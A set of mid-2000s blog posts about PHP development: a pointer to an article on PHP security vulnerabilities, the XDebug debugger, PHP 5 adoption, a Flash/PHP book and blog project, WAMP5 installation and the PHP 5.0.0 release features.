Is your Web application secure?

“No language can prevent insecure code, although there are language features which could aid or hinder a security-conscious developer.”

An interesting article on Security Focus illustrates examples on PHP coding and vulnerabilities.
The attacks explained in the article are:
1. Remote code execution
2. SQL injection
3. Format string vulnerabilities
4. Cross Site Scripting (XSS)
5. Username enumeration
http://www.securityfocus.com/infocus/1864

Debugging PHP with XDebug

In these days, working with PHP after a lot of time, I’ve installed this cool tool for debugging PHP (it supports both PHP 4 and 5).
XDebug is really useful for debugging PHP, which is usually not really easy to debug, and also easy to install.
It provides a lot of valuable debug informations, for example a full traceback for errors, profilig with memory and CPU usage, profiling functions , etc..
I really suggest to take a look at it!
Both Windows and Linux versions are available for download
http://www.xdebug.org

PHP5: a big failure ?

What’s happening ?
PHP 5 has been presented as a revolution, a lot of new features have been added and a lot of projects have been made. But only a small group of hosters seem interested in supporting PHP 5 on their web servers. It is not so useful to have a beautiful programming language to use if we can’t apply it to production environments.
But what about the causes ? Maybe they are related to the fact that Zend decided to support both PHP 4 and 5 separately, allowing hoster to choose which version to compile on their webservers, or maybe to the fact that PHP 5 is not fully compatible with the older versions, and there are some security-related bugs that increase our doubts.
I’m using a lot PHP 5 in production environments, without any problem. It is quite fast and reliable, and has got a lot of useful features that adapt perfectly to enterprise development. We MUST use PHP 5 to help it growing until it become the standard …
To conclude I’d like to inform the ones who don’t know it, that PHP team is working on the sixth version (yes … PHP 6 … and it is available for download at snaps.php.net) that will add to the language a lot of interesting features, such as native support to Unicode.
I hope there will be only one (working) version of PHP in the future …

Foundation PHP 5 for Flash

It was from days of Flash 5 which this book first time appeared. Long time has elapsed (expecially considering the informatic times).

Today I see that friends of Ed has published a new version of this book covering ActionScript 2.0, PHP 5 and MySQL 4.1.
Taking a look at the sample PDF chapter available it seems quite well done, clear and simple to read (ok, that is 2nd chapter and it talks of very basic things already…), but i noticed that it also threats of things/problems which often occured if you use php and flash everyday.. for example escape characters, magic_quotes_gpc etc..
I think i will going to get a copy of the book, it’s always useful take my mind under exercise…

A pure Flash Blog. OpenSource!

Guys at Motion4graphics.com have developed a flash blog ( www.flashblog.org ), i think the first Weblog made in Flash/Php/MySQL Opensource.

It is a project that is in Beta test, but that the main features already are already included. As they said: “We wished to be extending benefits little by little, we didn’t want to reinvent the Weblog”.
Next there will be the feature to donwload all the archives.

The main features are actually:
– Front End, developed in Flash.
– BackEnd developed in Php/MySQL
– Creation of categories.
– Searches.
– Limitation of entrances by page.
– extended Entrances (read more..).
– Publisher wysiwyg.
– Multiple users and authors.
– Limitless vertical Stage.
– Function botons back/ahead.
– Source codes FLA including.

Jpegs can be added, including the limitations of flash which can load only non progressive jpegs.. maybe they can add the GD support (or also image magik) in order to let all jpegs compatible and also PNG (waiting for gif support come back in the GD lib) ?
I’m still trying to understand how is set the framework.. how data is transmitted to flash (xml, remoting or flat loadvars)..

It seems a really promising project. take a minute to look at this.

Installing PHP5 on Apache server

Today i was trying to install the new PHP5 module on my local apache server.
It’s really simple at least, but when searching for instructions i discovered WAMP5, which includes in the installation:

  • Apache 1.3.31
  • PHP 5.0.0
  • MySQL 4.0.18
  • PhpMyAdmin 2.5.7
  • sqlitemanager

I’ve immediately installed it 😉
Once installed you’ll see a new tray icon with some options for your installed services.
I sugges it if you are thinking to install PHP5 on your local machine (i have also a separate apache/php4/mysql3 framework on my machine too, in this way i can always switch trought the two version of PHP/MySQL)

PHP 5.0.0 Released!

Finally, after months of release candidates…
Some of the key features of PHP 5 include:

* The Zend Engine II with a new object model and dozens of new features.
* XML support has been completely redone in PHP 5, all extensions are now focused around the excellent libxml2 library (http://www.xmlsoft.org/).
* A new SimpleXML extension for easily accessing and manipulating XML as PHP objects. It can also interface with the DOM extension and vice-versa.
* A brand new built-in SOAP extension for interoperability with Web Services.
* A new MySQL extension named MySQLi for developers using MySQL 4.1 and later. This new extension includes an object-oriented interface in addition to a traditional interface; as well as support for many of MySQL’s new features, such as prepared statements.
* SQLite has been bundled with PHP. For more information on SQLite, please visit their website.
* Streams have been greatly improved, including the ability to access low-level socket operations on streams.
* And lots more…

http://www.php.net